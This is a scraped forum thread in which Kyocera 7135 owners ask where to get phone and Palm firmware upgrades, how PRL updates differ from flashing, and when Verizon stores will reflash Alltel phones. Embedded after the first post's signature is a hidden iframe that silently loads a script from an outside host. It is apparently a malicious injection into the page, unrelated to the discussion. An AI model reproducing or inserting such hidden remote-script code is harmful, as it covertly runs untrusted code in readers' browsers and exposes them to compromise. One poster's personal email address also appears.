+ Reply to Thread
Page 1 of 2 1 2 LastLast

Where does one upgrade the firmware?

I think the subject says it all. Where (I know it is Kyocera, but what is the exact URL) does one get it from?

I think I am on the latest & greatest. 23/36 to be exact.

Thanks,

John<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I'm not sure if dialing *228 does it ?? Maybe that just does the roaming update. If so, then you'll probably have to take it to your local store to have it done.
    Michael

Maybe I am lost here, but I understodd that dialing *288, selecting option 2 would get you the latest and greatest. This is all I have done so far and I am also at 23/36 at this point.

Originally posted by thomaskemp
    Maybe I am lost here, but I understodd that dialing *288, selecting option 2 would get you the latest and greatest. This is all I have done so far and I am also at 23/36 at this point.
    *228 option 2 updates your PRL (preferred roaming list). This has nothing to do with phone or palm firmware, which are much too large to download over the phone. You also need to do a hard reset after updating the Palm firmware.

You are on 23/36 becuase you purchased your phone after those versions were released.

Alan

Anyone knows where to get the KWPST ver 3.3 or higher? I can find one for the 6035 but can't find one for the 7135.

Originally posted by alanb
    *228 option 2 updates your PRL (preferred roaming list). This has nothing to do with phone or palm firmware, which are much too large to download over the phone. You also need to do a hard reset after updating the Palm firmware.

You are on 23/36 becuase you purchased your phone after those versions were released.

Alan
    I know all this. My original question is how do upgrade the firmware when new versions come out? I hear about people "flashing" their phone which means the "flash" had to come from somewhere on the web. Where did it come from? I am assuming Kyocera, but what URL?

--John

Originally posted by zucchero
    I know all this. My original question is how do upgrade the firmware when new versions come out? I hear about people "flashing" their phone which means the "flash" had to come from somewhere on the web. Where did it come from? I am assuming Kyocera, but what URL?

--John
    You take your phone into a Verizon store and hand it to a tech and say "please flash my phone". They should be able to do this after 4/28, although they may not get the firmware until the next version is released.

To do it yourself, you need to know someone who can get you the KWPST tool and the firmware files. Since these are proprietary software, and this board actually got in trouble for posting the version for the 6035 some time ago, no one is going to publicly tell you they have the files available.

Sine you are already on the latest firmware, the point is moot anyway until the next release comes out and then Verizon will have it in all of their stores that have service centers.

Alan

Thanks again, Alan.

Tom

Any ALLTELer's upgraded the firmware?

I am on SZ 1.0.13 and MZ 1.0.27.

I have attempted to contact my corp rep to see if a firmware upgrade is available, but she has not gotten back to me.

Jeff
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

Verizon 7135 Firmware

I'm curious how can one get a firmware upgrade for Verizon? Everyone I call (Verizon or Kyocera) tell me the other should be able to provide it. Neither, apparently can point me in the right direction.

My 7135 is branded with Kyocera's firmware rather than Verizon's.

TIA!

Re: Verizon 7135 Firmware

Originally posted by jonecool
    I'm curious how can one get a firmware upgrade for Verizon? Everyone I call (Verizon or Kyocera) tell me the other should be able to provide it. Neither, apparently can point me in the right direction.

My 7135 is branded with Kyocera's firmware rather than Verizon's.

TIA!
    There is no such thing as Verizon firmware. There is older firmware and newer firmware. If you have older firmware, you should be able to get it upgraded to newer firmware after April 28th, although possibly not until the next firmware version is released. You do this at the Verizon stores that have service desks.

If you have Verizon branded phone purchased in the past couple of weeks, you have the current firmware. If you have a phone purchased form Alltel and activated on Verizon, you have the old firmware, and you either need to wait until Verizon can upgrade you, or know someone at Kyocera.

Alan

The devil-you-know vs the devil-you-don't-know. I'm fairly happy with my old Alltell firmware. What improvements will I get by upgrading my firmware, and what might I be losing in the process?

Re: Re: Verizon 7135 Firmware

There is no such thing as Verizon firmware. There is older firmware and newer firmware. If you have older firmware, you should be able to get it upgraded to newer firmware after April 28th, although possibly not until the next firmware version is released. You do this at the Verizon stores that have service desks.
    Thanks Alan! I was hoping it would be as easy as a URL somewhere to download it via the Serial connector (I did this sometime ago with an Symbol SPT-1500 PalmOS Device). I guess they don't want customers mucking with the firmware (Understandable). If it hangs in the middle of the process it could cause some serious problems with the phone.

A friends 7135 appeared to be branded by Verizon (power on/off showed verizon rather than Kyocera as mine does). I understand now that it's simply the startup/shutdown screen images.

My software versions are:
    Phone: MZ1.0.34
    PDA Soft: SZ 1.0.20
    PRL: 50075

Thanks again!

Originally posted by jazmaan
    The devil-you-know vs the devil-you-don't-know. I'm fairly happy with my old Alltell firmware. What improvements will I get by upgrading my firmware, and what might I be losing in the process?
    According to those who either have new VZW phones or have admitted that they somehow got the firmware on their Alltel phones, the new ones don't black screen of death anymore. They still have fatal errors, but they give the correct error messages now. Personally, I never really had the Black Screen of Death issue.

There was a feature added to optimize searching for address book records when you receive caller ID. You can have the digital/analog indicator also show 1x when you are in an express network region, and the new phones get ERI capable PRL's. Those are the only differences I have heard people mention. I have heard that there were a ton of corrections, and possibly some changes to help extend the battery life, but I don't have details on that.

I also believe that the CallerID problem was fixed, but since that has primarilly been reported by users in NYC, and so far no one in NYC has reported getting a new phone, I don't know if that is correct. I have never experienced the problem in Maryland, or when I have travelled in NY, but I didn't receive any calls while I was in or near the city.

Alan

According to those who either have new VZW phones or have admitted that they somehow got the firmware on their Alltel phones, the new ones don't black screen of death anymore. They still have fatal errors, but they give the correct error messages now. Personally, I never really had the Black Screen of Death issue.
    You know, a bug in the fatal error handling is perhaps one of the most ironic I've ever seen. Personally, I've never seen the BSD in release-level software.

Originally posted by jazmaan
    I for one would be willing to try the new firmware, I have had my 7135 for a good amount of time (this is my second one, I returned the first because the screen brightness varied so much), The one that I have now and the one I had before, both exhibit the same behavior, they will not go a full day without a reset (mostly the kind where I open the unit and it is dead, I push the reset button and it comes back to life, very frustrating).

Carriers are going to be your only recourse.

Reprogram Alltel to Verizon in So. Cal.

I live in ventura County, can anyone tell me which Verizon stores I can get my firmware upgraded to Verizon

at this time i believe the answer is none, as of the 28th of the month you should be able to go to any store that has a technician,but for now its just wait until verizon stores actually carry the phone and get the software they need, after that it is a standard process that ant tech can do. i amd deperatly waiting as i get the caller id bug when i travel,although in my home area it works fine.
    B.Andrew "Andy" Brown,MSW
    Executive Director,Camp Livingston.Inc

Will there be a Firmware Upgrade Available to US???

I love my 7135 EXCEPT I'm becoming increasingly concerned about the number of FATAL ERRORS, LOCK-UPS, and soft and (dare I say it) hard resets necessary to keep things going. This is clearly happening for many of us far more often than is acceptable over time. BOTTOM LINE is I really want to keep my 7135, but I need some reassurance that the bugs will be resolved over time, and MY PHONE will get the upgrade too. Can anyone shed some light on this as I think many of us would sleep easier (having pleasant dreams about our super cool SmartPhones) if we knew there was a light at the end of the tunnel. And does anyone know if there's a chance Kyocera (or Verizon) would only provide bug-free firmware in phones sold from that point forward, leaving us early adopters out in the cold (which would turn any pleasant dreams into nightmares...).

Thanks to those with knowledge in this area for your input!

Tony
    (PS This is my first post...the importance of this issue got me to do it!)